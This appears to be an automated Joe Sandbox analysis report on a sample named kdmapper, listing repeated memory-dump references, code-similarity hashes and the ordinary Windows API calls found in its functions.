                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: c5c56fa882dbc029aad3429fd62f572ad3af21817f4d3082db13689e8f0e8b77
                                                                                                                                                                          • Instruction ID: 84b86a1eea6a834cea224b567b07fb1dcd676de79e2b86f8b6427f246e231a28
                                                                                                                                                                          • Opcode Fuzzy Hash: c5c56fa882dbc029aad3429fd62f572ad3af21817f4d3082db13689e8f0e8b77
                                                                                                                                                                          • Instruction Fuzzy Hash: DDA011E22A8202BC300822002C02C3B028FC0C0B2AB30802EF822A00C0AC82080A08B2
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E3FC
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: b16020762d5cb71354aa08042c86783c5cc0e3f48ae05382d8b79c27715be8e2
                                                                                                                                                                          • Instruction ID: fb4c9c5709f32ea20fa9df903b0a76431e53538d768a5566869efbdc742412c6
                                                                                                                                                                          • Opcode Fuzzy Hash: b16020762d5cb71354aa08042c86783c5cc0e3f48ae05382d8b79c27715be8e2
                                                                                                                                                                          • Instruction Fuzzy Hash: FAA011E22AC202BC300822002C02C3B028FC0C0B22B30882EF802A00C0A882080A08B2
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E3FC
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: feefb718577018a75243e74707f80cef145f3e7e944f38d9e92e6bd47ab80d0a
                                                                                                                                                                          • Instruction ID: fb4c9c5709f32ea20fa9df903b0a76431e53538d768a5566869efbdc742412c6
                                                                                                                                                                          • Opcode Fuzzy Hash: feefb718577018a75243e74707f80cef145f3e7e944f38d9e92e6bd47ab80d0a
                                                                                                                                                                          • Instruction Fuzzy Hash: FAA011E22AC202BC300822002C02C3B028FC0C0B22B30882EF802A00C0A882080A08B2
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E3FC
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 795f566f1c3a0b9a055c246ec7d2655cff255027834d65f3dd170708a1880a2f
                                                                                                                                                                          • Instruction ID: fb4c9c5709f32ea20fa9df903b0a76431e53538d768a5566869efbdc742412c6
                                                                                                                                                                          • Opcode Fuzzy Hash: 795f566f1c3a0b9a055c246ec7d2655cff255027834d65f3dd170708a1880a2f
                                                                                                                                                                          • Instruction Fuzzy Hash: FAA011E22AC202BC300822002C02C3B028FC0C0B22B30882EF802A00C0A882080A08B2
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E3FC
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 6316eb9a53c361bf8e2301ec0769d9d6a7c4801fb0b0c363c420aa11f3d5305f
                                                                                                                                                                          • Instruction ID: fb4c9c5709f32ea20fa9df903b0a76431e53538d768a5566869efbdc742412c6
                                                                                                                                                                          • Opcode Fuzzy Hash: 6316eb9a53c361bf8e2301ec0769d9d6a7c4801fb0b0c363c420aa11f3d5305f
                                                                                                                                                                          • Instruction Fuzzy Hash: FAA011E22AC202BC300822002C02C3B028FC0C0B22B30882EF802A00C0A882080A08B2
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E3FC
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 2090ec61f9510aa38bae2182e588fa663d865c4766480c59882877c61c163d2d
                                                                                                                                                                          • Instruction ID: fb4c9c5709f32ea20fa9df903b0a76431e53538d768a5566869efbdc742412c6
                                                                                                                                                                          • Opcode Fuzzy Hash: 2090ec61f9510aa38bae2182e588fa663d865c4766480c59882877c61c163d2d
                                                                                                                                                                          • Instruction Fuzzy Hash: FAA011E22AC202BC300822002C02C3B028FC0C0B22B30882EF802A00C0A882080A08B2
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetEndOfFile.KERNELBASE(?,0062903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00629F0C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 749574446-0
                                                                                                                                                                          • Opcode ID: bb82dc71e6543764456a1624675de3eafd27be86da5774306edcbcc7969b6a61
                                                                                                                                                                          • Instruction ID: 58bef72e28d6470569549ff6e68aaa74ed965a5b21097a6f3cc623a76ff06b8e
                                                                                                                                                                          • Opcode Fuzzy Hash: bb82dc71e6543764456a1624675de3eafd27be86da5774306edcbcc7969b6a61
                                                                                                                                                                          • Instruction Fuzzy Hash: 09A01230040119468E001730C90400D3711E710BC170011945006CA0A1C71244078700
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,0063AE72,C:\Users\user\Desktop,00000000,0066946A,00000006), ref: 0063AC08
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1611563598-0
                                                                                                                                                                          • Opcode ID: 83c2f1b0716bed9057633077f57bebcc8959a81fc086bb132e09a74a567feec9
                                                                                                                                                                          • Instruction ID: 0deac74f18e94e20b4508ecf68a2347d657ef88ac4e70a3d7527105f1577080e
                                                                                                                                                                          • Opcode Fuzzy Hash: 83c2f1b0716bed9057633077f57bebcc8959a81fc086bb132e09a74a567feec9
                                                                                                                                                                          • Instruction Fuzzy Hash: B7A011302002008B83008B328F0AA0EBAAAAFA2B82F00C028A00080230CB30C820AA00
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNELBASE(000000FF,?,?,006295D6,?,?,?,?,?,00652641,000000FF), ref: 0062963B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                          • Opcode ID: 36eb7598cd062712514589008d15684865237b67baeb1abcacc57c772461ded9
                                                                                                                                                                          • Instruction ID: 2156b7f1250a9446727303115ab6ab1fbe3a0d3442c99b2b24a51653f98b791c
                                                                                                                                                                          • Opcode Fuzzy Hash: 36eb7598cd062712514589008d15684865237b67baeb1abcacc57c772461ded9
                                                                                                                                                                          • Instruction Fuzzy Hash: 8DF0E930081F259FEB308A20D4587D277EA6B52321F042B1ED0E242AE0D761658DDF50
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00621316: GetDlgItem.USER32(00000000,00003021), ref: 0062135A
                                                                                                                                                                            • Part of subcall function 00621316: SetWindowTextW.USER32(00000000,006535F4), ref: 00621370
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0063C2B1
                                                                                                                                                                          • EndDialog.USER32(?,00000006), ref: 0063C2C4
                                                                                                                                                                          • GetDlgItem.USER32(?,0000006C), ref: 0063C2E0
                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 0063C2E7
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000065,?), ref: 0063C321
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0063C358
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0063C36E
                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0063C38C
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0063C39C
                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0063C3B8
                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0063C3D4
                                                                                                                                                                          • _swprintf.LIBCMT ref: 0063C404
                                                                                                                                                                            • Part of subcall function 00624092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006240A5
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0063C417
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0063C41E
                                                                                                                                                                          • _swprintf.LIBCMT ref: 0063C477
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000068,?), ref: 0063C48A
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0063C4A7
                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0063C4C7
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0063C4D7
                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0063C4F1
                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0063C509
                                                                                                                                                                          • _swprintf.LIBCMT ref: 0063C535
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0063C548
                                                                                                                                                                          • _swprintf.LIBCMT ref: 0063C59C
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000069,?), ref: 0063C5AF
                                                                                                                                                                            • Part of subcall function 0063AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0063AF35
                                                                                                                                                                            • Part of subcall function 0063AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0065E72C,?,?), ref: 0063AF84
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                                                          • String ID: %s %s$%s %s %s$Pc$REPLACEFILEDLG
                                                                                                                                                                          • API String ID: 797121971-948700689
                                                                                                                                                                          • Opcode ID: 61bcf451bd86a3fc329cd0da13e23302eb6f28cdec13748570ac9cd89e85bce2
                                                                                                                                                                          • Instruction ID: 43c66876fbf60832e177f6e4b13a50e55a903cbfa0585ca67d54aba4ebd62406
                                                                                                                                                                          • Opcode Fuzzy Hash: 61bcf451bd86a3fc329cd0da13e23302eb6f28cdec13748570ac9cd89e85bce2
                                                                                                                                                                          • Instruction Fuzzy Hash: C491A472148354BBD331DBA0DC49FFB77AEEB8AB50F004919F789D6181DB71A6048B62
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0063F844
                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0063F910
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0063F930
                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0063F93A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                          • Opcode ID: be1a70f5b72a1315739730467fba5434ec8a9d9ff38475f5bc3b3ba7d36bd0de
                                                                                                                                                                          • Instruction ID: 3f41843db7a49a1a3c3ed521b41facd07192cf9f0fc8a66e8b8450e032d75b1f
                                                                                                                                                                          • Opcode Fuzzy Hash: be1a70f5b72a1315739730467fba5434ec8a9d9ff38475f5bc3b3ba7d36bd0de
                                                                                                                                                                          • Instruction Fuzzy Hash: B4311675D0531D9BDB61DFA4D989BCCBBB8AF08705F1040AAE40DAB390EB719B848F44
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualQuery.KERNEL32(80000000,0063E5E8,0000001C,0063E7DD,00000000,?,?,?,?,?,?,?,0063E5E8,00000004,00681CEC,0063E86D), ref: 0063E6B4
                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0063E5E8,00000004,00681CEC,0063E86D), ref: 0063E6CF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoQuerySystemVirtual
                                                                                                                                                                          • String ID: D
                                                                                                                                                                          • API String ID: 401686933-2746444292
                                                                                                                                                                          • Opcode ID: a6d3295eadbd782048ab97a9cf7c5d58f4cafa2a8643a7c67aa5c8cfa96271c4
                                                                                                                                                                          • Instruction ID: 14f81e66f6fc879679ef2224a7f4896e5c2ff0a5b843fb3bb89f073d24f7e148
                                                                                                                                                                          • Opcode Fuzzy Hash: a6d3295eadbd782048ab97a9cf7c5d58f4cafa2a8643a7c67aa5c8cfa96271c4
                                                                                                                                                                          • Instruction Fuzzy Hash: 0901D432A002096BDB24DE29DC49BDD7BAAAFC4324F0CC120ED19DA390DA35DD05C690
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(00626DDF,00000000,00000400), ref: 00626C74
                                                                                                                                                                          • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00626C95
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3479602957-0
                                                                                                                                                                          • Opcode ID: 185b18d575a880f7146742d5f418f442b6b159051808e4ba4c82e2433eab59af
                                                                                                                                                                          • Instruction ID: 2a6d767b4c6bc571858ad30995de7b36b592dd56ddc215c2462676d23d07105f
                                                                                                                                                                          • Opcode Fuzzy Hash: 185b18d575a880f7146742d5f418f442b6b159051808e4ba4c82e2433eab59af
                                                                                                                                                                          • Instruction Fuzzy Hash: F7D0A730344310BFFB011F219C06F1B3B5ABF40F82F14C0047740D40E0C6708810AB15
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0063F66A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
